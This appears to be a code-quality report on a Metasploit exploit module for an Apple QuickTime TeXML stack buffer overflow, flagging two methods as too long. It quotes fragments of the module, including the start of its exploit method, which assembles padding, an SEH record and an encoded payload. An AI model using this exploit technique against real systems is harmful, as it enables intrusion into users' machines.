modules/exploits/windows/fileformat/apple_quicktime_texml.rb
Method initialize
has 61 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple QuickTime TeXML Style Element Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in Apple QuickTime. When handling
Method exploit
has 42 lines of code (exceeds 25 allowed). Consider refactoring. Open
Open
def exploit
my_payload = rand_text(target['Offset'])
my_payload << generate_seh_record(target.ret)
my_payload << payload.encoded
my_payload << rand_text(target['Max'] - my_payload.length)